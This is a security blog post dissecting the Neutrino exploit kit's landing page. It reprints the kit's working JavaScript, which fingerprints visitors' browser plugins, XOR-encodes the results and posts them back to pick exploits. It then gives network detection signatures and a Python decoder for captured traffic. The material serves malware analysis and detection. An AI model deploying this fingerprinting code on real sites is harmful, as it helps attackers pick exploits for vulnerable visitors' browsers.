Sunday, March 31, 2013

Neutrino Exploit Kit landing page demystified


I finally got the time to look into the landing page of Neutrino. Thanks to @malwaresigs and @kafeine for providing samples :)

What is this shiny new EK up to when it comes to the landing page? I have only seen clear-text versions, so no deobfuscation is needed.

Look here for a deeper analysis of "Neutrino Exploit Kit Analysis"

1. The landing


<!DOCTYPE HTML>
<html>
<head>
 <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script> 
 <script type="text/javascript" src="scripts/js/plugin_detector.js"></script>
 <script type="text/javascript">
  $(document).ready(function() {
   qweqwewqe('515245e3aaa2cbaa2a00002b');
  });

  function qweqwewqe(hid) {
   var info = {
    plugins : {
     java: plg_all_vers('Java'),
     adobe_reader: plg_ver('AdobeReader'),
     flash: plg_ver('Flash'),
     quick_time: plg_ver('QuickTime'),
     real_player: plg_ver('RealPlayer'),
     shockwave: plg_ver('Shockwave'),
     silver_light: plg_ver('Silverlight'),
     vlc: plg_ver('VLC'),
     wmp: plg_ver('WMP')
    }
   }
      
   var pass = rnd_str(1+Math.floor(Math.random()*10));
   var obj = {};
   obj["h"+rnd_str(1+Math.floor(Math.random()*10))] = hid;      // host id
   obj["p"+rnd_str(1+Math.floor(Math.random()*10))] = pass;     // XOR pass
   obj["i"+rnd_str(1+Math.floor(Math.random()*10))] = kor(JSON.stringify(info), pass);
   
   $("body").load("c"+rnd_str(1+Math.floor(Math.random()*10)), obj);  
  }

  function plg_all_vers(name) {
   var info = PluginDetect.getInfo(name);
   var vers = info.All_versions;
   if(!vers)
    return '';
   return info.All_versions.join(';')
  }

  function plg_ver(name) {
   var info = PluginDetect.getVersion(name);
   return info;
  }
  
  function rnd_str(len) {
   len++;
   var result = [];
   var chars = 'abcdefghijklmnopqrstuvwxyz0123456789';
   while (--len) {
    result.push(chars.charAt(Math.floor(Math.random() * chars.length)));
   }
   return result.join('');
  }


  
  function kor(input, pass) {
   var output = "";
   var i = 0;
   var pos = 0;
   for (i = 0; i < input.length; i++){ 
     pos = Math.floor(i%pass.length);
     output += String.fromCharCode(input.charCodeAt(i) ^ pass.charCodeAt(pos));
   }
   return output;
  }

  JSON.stringify = JSON.stringify || function (obj) {
   var t = typeof (obj);
   if (t != "object" || obj === null) {
    // simple data type
    if (t == "string") obj = '"'+obj+'"';
    return String(obj);
   }
   else {
    // recurse array or object
    var n, v, json = [], arr = (obj && obj.constructor == Array);
    for (n in obj) {
     v = obj[n]; t = typeof(v);
     if (t == "string") v = '"'+v+'"';
     else if (t == "object" && v !== null) v = JSON.stringify(v);
     json.push((arr ? "" : '"' + n + '":') + String(v));
    }
    return (arr ? "[" : "{") + String(json) + (arr ? "]" : "}");
   }
  };


 </script> 
</head>
<body>
</body>
</html>

The JavaScript calls the function qweqwewqe with an id (the comment in the script says host id), which we can see will be used to fetch the JARs and the final payload. Link to @malwaresigs


PluginDetect is used to enumerate the plugins installed on the client.

Variables are built:

//xor password generation:
var pass = rnd_str(1+Math.floor(Math.random()*10));
//@malforsec random string [a-z0-9]{1,10}
//host id assigned:
obj["h"+rnd_str(1+Math.floor(Math.random()*10))] = hid;      // host id
//@malforsec h + [a-z0-9]{1,10} = 515245e3aaa2cbaa2a00002b
//xor password assigned:
obj["p"+rnd_str(1+Math.floor(Math.random()*10))] = pass;     // XOR pass
//@malforsec p + [a-z0-9]{1,10} = [a-z0-9]{1,10}
//plugin results stringified, XORed and assigned:
obj["i"+rnd_str(1+Math.floor(Math.random()*10))] = kor(JSON.stringify(info), pass);
//@malforsec i + [a-z0-9]{1,10} = XOR info with pass
//jquery to build the post:
$("body").load("c"+rnd_str(1+Math.floor(Math.random()*10)), obj);
//@malforsec c + [a-z0-9]{1,10}, obj


2. Debugger output

Browser plugin detection


Plugin detection string with XOR key and XORED PD string


Post request built


3. Wireshark output

POST request captured with Wireshark


4. Signatures

These patterns may vary or have changed - look here

POST request to /c[a-z0-9]{1,10}
Content-type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
h[a-z0-9]{1,10}=[a-f0-9]{24}
i[a-z0-9]{1,10}=.*
p[a-z0-9]{1,10}=[a-z0-9]{1,10}$
That should pin it down pretty well :)
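As an added example (not the blog's or the kit's own code), here is a Python decoder that applies the parameter patterns above to a captured POST body and reverses the landing page's kor() XOR to recover the plugin inventory. The parameter suffixes, XOR key and plugin versions in the sample body are constructed; only the host id comes from the captured page.

```python
import json
import re
from typing import Optional
from urllib.parse import parse_qsl, urlencode

# Parameter names are one fixed prefix letter plus a random [a-z0-9]{1,10} suffix
PARAM_RE = re.compile(r"^([hip])[a-z0-9]{1,10}$")
HOST_ID_RE = re.compile(r"^[a-f0-9]{24}$")
KEY_RE = re.compile(r"^[a-z0-9]{1,10}$")

def kor(text: str, key: str) -> str:
    """Mirror of the landing page's kor(): XOR each code point with the repeating
    key. XOR is its own inverse, so one function both encodes and decodes."""
    return "".join(chr(ord(c) ^ ord(key[i % len(key)])) for i, c in enumerate(text))

def decode_neutrino_post(body: str) -> Optional[dict]:
    """Parse a form-urlencoded POST body, pick out the h*/p*/i* parameters by
    prefix, check them against the signature patterns, and XOR-decode the plugin
    inventory. Returns None when the body does not look like a Neutrino check-in."""
    params = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        m = PARAM_RE.match(name)
        if m:
            params[m.group(1)] = value
    if set(params) != {"h", "p", "i"}:
        return None
    if not HOST_ID_RE.match(params["h"]) or not KEY_RE.match(params["p"]):
        return None
    try:
        info = json.loads(kor(params["i"], params["p"]))
    except ValueError:
        return None
    if not isinstance(info, dict):
        return None
    return {"host_id": params["h"], "xor_key": params["p"], "plugins": info.get("plugins", {})}

# Constructed sample body: what the landing page would POST for a host running
# made-up Java and Flash versions and no Adobe Reader, using the XOR key "k3y".
# The host id is the one from the captured landing page; the suffixes are invented.
SAMPLE_INFO = {"plugins": {"java": "1,7,0,10", "adobe_reader": None, "flash": "11,6,602,180"}}
SAMPLE_BODY = urlencode({
    "hab12": "515245e3aaa2cbaa2a00002b",
    "pq9": "k3y",
    "izz7": kor(json.dumps(SAMPLE_INFO, separators=(",", ":")), "k3y"),
})
```

Feed the raw body of a captured POST to decode_neutrino_post(); the same XOR walk, applied to the JSON from the debugger output, reproduces the i-parameter seen on the wire.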

In addition we got some tips on how to get the different payloads out of the kit, should we need to some day :)

Happy detecting Neutrino EK POST landing  
